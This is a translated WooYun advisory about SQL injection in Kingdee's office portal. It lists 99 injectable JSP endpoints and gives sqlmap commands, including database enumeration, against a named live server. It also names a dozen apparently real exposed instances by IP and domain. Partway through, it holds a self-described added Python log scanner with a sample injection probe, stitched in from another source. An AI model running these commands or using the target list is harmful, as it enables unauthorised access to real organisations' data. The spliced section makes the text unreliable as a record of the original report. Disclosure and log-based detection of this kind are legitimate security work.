
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0140344

Title: Kingdee collaborative office system contains 99 high-risk SQL injections

Vendor: Kingdee (金蝶)

Author: 路人甲

Submitted: 2015-09-11 12:23

Fixed: 2015-12-13 09:29

Published: 2015-12-13 09:29

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org. For questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-09-11: Details sent to the vendor, awaiting vendor handling
2015-09-14: Vendor actively ignored the vulnerability; details opened to third-party security partners
2015-11-08: Details opened to core white hats and experts in related fields
2015-11-18: Details opened to regular white hats
2015-11-28: Details opened to intern white hats
2015-12-13: Details opened to the public

Brief description:

The Kingdee collaborative office system contains 99 high-risk SQL injections.

Detailed description:

"To protect our customers' interests, we no longer accept any vulnerability reports."
Since that is your position, I will keep posting vulnerabilities anyway, in the hope of correcting this mistaken attitude.
The vulnerable files: there are 3 distinct files, but they are deployed under 33 directories, so 3 * 33 = 99 injectable endpoints.

/portal/portlet/custom_Analytical/set.jsp
/portal/portlet/custom_Analytical_diagram/set.jsp
/portal/portlet/document/set.jsp
/portal/portlet/document_req/set.jsp
/portal/portlet/flow_performance_list/set.jsp
/portal/portlet/flow_performance_show/set.jsp
/portal/portlet/guestbook/set.jsp
/portal/portlet/guestbook_new/set.jsp
/portal/portlet/news_photos/set.jsp
/portal/portlet/office_history/set.jsp
/portal/portlet/office_process/set.jsp
/portal/portlet/outpage/set.jsp
/portal/portlet/person_doc_list/set.jsp
/portal/portlet/person_mail/set.jsp
/portal/portlet/person_new_doc/set.jsp
/portal/portlet/person_new_mail/set.jsp
/portal/portlet/person_new_plan/set.jsp
/portal/portlet/person_plan/set.jsp
/portal/portlet/pubinfo_bbs/set.jsp
/portal/portlet/pubinfo_db_conn/set.jsp
/portal/portlet/pubinfo_discuss/set.jsp
/portal/portlet/pubinfo_images/set.jsp
/portal/portlet/pubinfo_links/set.jsp
/portal/portlet/pubinfo_news/set.jsp
/portal/portlet/pubinfo_new_bbs/set.jsp
/portal/portlet/pubinfo_new_discuss/set.jsp
/portal/portlet/pubinfo_new_links/set.jsp
/portal/portlet/pubinfo_new_news/set.jsp
/portal/portlet/pubinfo_new_onLine/set.jsp
/portal/portlet/pubinfo_onLine/set.jsp
/portal/portlet/pubinfo_url/set.jsp
/portal/portlet/resource/set.jsp
/portal/portlet/userlink/set.jsp
/portal/portlet/custom_Analytical/set_submit.jsp
/portal/portlet/custom_Analytical_diagram/set_submit.jsp
/portal/portlet/document/set_submit.jsp
/portal/portlet/document_req/set_submit.jsp
/portal/portlet/flow_performance_list/set_submit.jsp
/portal/portlet/flow_performance_show/set_submit.jsp
/portal/portlet/guestbook/set_submit.jsp
/portal/portlet/guestbook_new/set_submit.jsp
/portal/portlet/news_photos/set_submit.jsp
/portal/portlet/office_history/set_submit.jsp
/portal/portlet/office_process/set_submit.jsp
/portal/portlet/outpage/set_submit.jsp
/portal/portlet/person_doc_list/set_submit.jsp
/portal/portlet/person_mail/set_submit.jsp
/portal/portlet/person_new_doc/set_submit.jsp
/portal/portlet/person_new_mail/set_submit.jsp
/portal/portlet/person_new_plan/set_submit.jsp
/portal/portlet/person_plan/set_submit.jsp
/portal/portlet/pubinfo_bbs/set_submit.jsp
/portal/portlet/pubinfo_db_conn/set_submit.jsp
/portal/portlet/pubinfo_discuss/set_submit.jsp
/portal/portlet/pubinfo_images/set_submit.jsp
/portal/portlet/pubinfo_links/set_submit.jsp
/portal/portlet/pubinfo_news/set_submit.jsp
/portal/portlet/pubinfo_new_bbs/set_submit.jsp
/portal/portlet/pubinfo_new_discuss/set_submit.jsp
/portal/portlet/pubinfo_new_links/set_submit.jsp
/portal/portlet/pubinfo_new_news/set_submit.jsp
/portal/portlet/pubinfo_new_onLine/set_submit.jsp
/portal/portlet/pubinfo_onLine/set_submit.jsp
/portal/portlet/pubinfo_url/set_submit.jsp
/portal/portlet/resource/set_submit.jsp
/portal/portlet/userlink/set_submit.jsp
/portal/portlet/custom_Analytical/view.jsp
/portal/portlet/custom_Analytical_diagram/view.jsp
/portal/portlet/document/view.jsp
/portal/portlet/document_req/view.jsp
/portal/portlet/flow_performance_list/view.jsp
/portal/portlet/flow_performance_show/view.jsp
/portal/portlet/guestbook/view.jsp
/portal/portlet/guestbook_new/view.jsp
/portal/portlet/news_photos/view.jsp
/portal/portlet/office_history/view.jsp
/portal/portlet/office_process/view.jsp
/portal/portlet/outpage/view.jsp
/portal/portlet/person_doc_list/view.jsp
/portal/portlet/person_mail/view.jsp
/portal/portlet/person_new_doc/view.jsp
/portal/portlet/person_new_mail/view.jsp
/portal/portlet/person_new_plan/view.jsp
/portal/portlet/person_plan/view.jsp
/portal/portlet/pubinfo_bbs/view.jsp
/portal/portlet/pubinfo_db_conn/view.jsp
/portal/portlet/pubinfo_discuss/view.jsp
/portal/portlet/pubinfo_images/view.jsp
/portal/portlet/pubinfo_links/view.jsp
/portal/portlet/pubinfo_news/view.jsp
/portal/portlet/pubinfo_new_bbs/view.jsp
/portal/portlet/pubinfo_new_discuss/view.jsp
/portal/portlet/pubinfo_new_links/view.jsp
/portal/portlet/pubinfo_new_news/view.jsp
/portal/portlet/pubinfo_new_onLine/view.jsp
/portal/portlet/pubinfo_onLine/view.jsp
/portal/portlet/pubinfo_url/view.jsp
/portal/portlet/resource/view.jsp
/portal/portlet/userlink/view.jsp


Since all three files exist under every directory, any one directory can be used for testing; the document directory is used here:

sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/portal/portlet/document/set.jsp?portal_id=1"

(screenshot: 1.png)


sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/portal/portlet/document/set_submit.jsp?portlet_id=1"

(screenshot: 2.png)


sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/portal/portlet/document/view.jsp?portal_id=1&portlet_id=1"

(screenshot: 3.png)


Data retrieved during the sqlmap test:

sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/portal/portlet/document/set.jsp?portal_id=1" --dbs

(screenshot: data.png)
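The advisory shows the injection reaching the server through the `portal_id` and `portlet_id` query parameters of `set.jsp`, `set_submit.jsp` and `view.jsp` under any `/portal/portlet/<name>/` directory. Because the vendor states below that no patch is available, a defender's practical options are a front-end filter and log review. The following is an added example, not code from the advisory or from Kingdee: it scans web-server access log lines in combined log format, limits attention to the affected endpoint paths (assumed to sit under the `/kingdee/` context path seen in the page's URLs), and flags any request whose `portal_id` or `portlet_id` is not a plain integer, plus any request whose user agent identifies sqlmap. The log lines, client addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The three JSP files named in the advisory, present under every
# /portal/portlet/<name>/ directory. The /kingdee/ context path is taken
# from the URLs in the advisory and is an assumption for other deployments.
PATH_RE = re.compile(r"^/kingdee/portal/portlet/[^/]+/(set|set_submit|view)\.jsp$")

# The query parameters the advisory injected through. Both are numeric ids,
# so anything other than an ASCII digit string is out of spec.
ID_PARAMS = ("portal_id", "portlet_id")

# Apache/nginx "combined" log format (constructed regex, covers the fields used here).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<ua>[^"]*)"$'
)


def inspect_request(target, ua=""):
    """Return a list of findings for one request target (path plus query string).

    Only the affected portlet endpoints are inspected; everything else yields [].
    """
    parts = urlsplit(target)
    if not PATH_RE.match(parts.path):
        return []
    findings = []
    # parse_qs percent-decodes values, so an encoded quote is seen as a quote.
    params = parse_qs(parts.query, keep_blank_values=True)
    for name in ID_PARAMS:
        for value in params.get(name, []):
            if not (value.isascii() and value.isdigit()):
                findings.append(f"{name} is not an integer: {value}")
    if "sqlmap" in ua.lower():
        findings.append("user agent identifies sqlmap")
    return findings


def scan_log(lines):
    """Return (client_ip, target, findings) for every log line that raises a finding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        findings = inspect_request(m["target"], m["ua"])
        if findings:
            hits.append((m["ip"], m["target"], findings))
    return hits


# Constructed sample log (documentation-range addresses, not real clients).
SAMPLE_LOG = [
    # ordinary page view with numeric ids: no finding
    '192.0.2.20 - - [11/Sep/2015:12:20:01 +0800] "GET /kingdee/portal/portlet/document/view.jsp?portal_id=1&portlet_id=1 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    # login page: not one of the affected endpoints, ignored
    '192.0.2.20 - - [11/Sep/2015:12:20:05 +0800] "GET /kingdee/login/loginpage.jsp HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    # quote-and-tautology probe in portal_id, percent-encoded on the wire
    '192.0.2.10 - - [11/Sep/2015:12:23:10 +0800] "GET /kingdee/portal/portlet/document/set.jsp?portal_id=1%27%20AND%201%3D1 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    # scanner announcing itself, even though the id value is clean
    '192.0.2.10 - - [11/Sep/2015:12:23:11 +0800] "GET /kingdee/portal/portlet/document/set_submit.jsp?portlet_id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev"',
]

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target, "; ".join(findings))
```

The integer check is the useful part: it does not depend on recognising any particular payload, so it also catches hand-crafted probes and scanners with a spoofed user agent, and the same rule can be enforced at a reverse proxy in front of an unpatched instance. The user-agent check is only a cheap extra signal and should never be the sole rule.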


Affected instances:

http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp
http://222.179.238.182:8082/kingdee/login/loginpage2.jsp
http://221.4.245.218:8080/kingdee/login/loginpage.jsp
http://220.189.244.202:8080/kingdee/login/loginpage.jsp
http://222.133.44.10:8080/kingdee/login/loginpage.jsp
http://60.194.110.187/kingdee/login/loginpage.jsp
http://oa.roen.cn/kingdee/login/loginpage.jsp
http://221.226.149.17:8080/kingdee/login/loginpage.jsp
http://223.95.183.6:8080/kingdee/login/loginpage.jsp
http://122.139.60.103:800/kingdee/login/loginpage.jsp
http://222.134.77.23:8080/kingdee/login/loginpage.jsp
http://61.190.20.51/kingdee/login/loginpage.jsp

Proof of vulnerability:

sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/portal/portlet/document/set.jsp?portal_id=1" --dbs

(screenshot: data.png)

Fix recommendation:

Copyright notice: when reposting, please credit the source: 路人甲@WooYun


Vulnerability response

Vendor response:

Severity: No impact; vendor ignored

Ignored at: 2015-12-13 09:29

Vendor reply:


White hat brothers, this product is one that Kingdee resold years ago on behalf of Shanghai Xieda (上海协达). Shanghai Xieda has replied that the vulnerability cannot be fixed with a patch and the product can only be upgraded or replaced, so it cannot be handled in the short term. We have always acknowledged and supported the efforts of white hats, will grant rewards according to the circumstances, and will add further rewards in the future! We hope everyone keeps following Kingdee security!

Latest status:

None yet